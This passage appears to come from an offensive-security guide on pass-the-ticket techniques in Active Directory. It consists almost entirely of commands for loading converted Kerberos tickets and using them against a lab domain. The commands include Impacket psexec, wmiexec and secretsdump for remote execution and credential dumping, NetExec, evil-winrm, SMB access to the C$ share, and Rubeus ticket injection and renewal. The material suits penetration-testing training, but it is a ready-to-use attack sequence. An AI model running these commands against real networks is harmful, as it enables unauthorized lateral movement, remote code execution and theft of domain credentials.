After conversion, we validate the ticket, point tooling at it, and use Kerberos-aware protocols. The two most common usage paths are Linux ccache through KRB5CCNAME and Windows .kirbi injection through Rubeus.
Use a ccache on Linux:
export KRB5CCNAME=FILE:$(pwd)/ticket.ccache
klist -e
LDAP with Kerberos:
ldapsearch -Y GSSAPI -H ldap://dc01.ootw.local -b 'DC=ootw,DC=local' '(objectClass=domain)'
SMB with Kerberos:
smbclient -k //dc01.ootw.local/C$
Impacket with Kerberos:
psexec.py -k -no-pass ootw.local/user@target.ootw.local -dc-ip 10.10.10.200
wmiexec.py -k -no-pass ootw.local/user@target.ootw.local -dc-ip 10.10.10.200
secretsdump.py -k -no-pass ootw.local/user@target.ootw.local -dc-ip 10.10.10.200
NetExec with Kerberos:
nxc smb 10.10.10.200 -d ootw.local -u user -k --use-kcache
nxc ldap 10.10.10.200 -d ootw.local -u user -k --use-kcache
evil-winrm with Kerberos:
evil-winrm -i dc01.ootw.local -r OOTW.LOCAL -k
Inject a .kirbi on Windows:
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist
Describe a ticket with Rubeus:
.\Rubeus.exe describe /ticket:ticket.kirbi
Renew a TGT before it expires:
.\Rubeus.exe renew /ticket:ticket.kirbi /ptt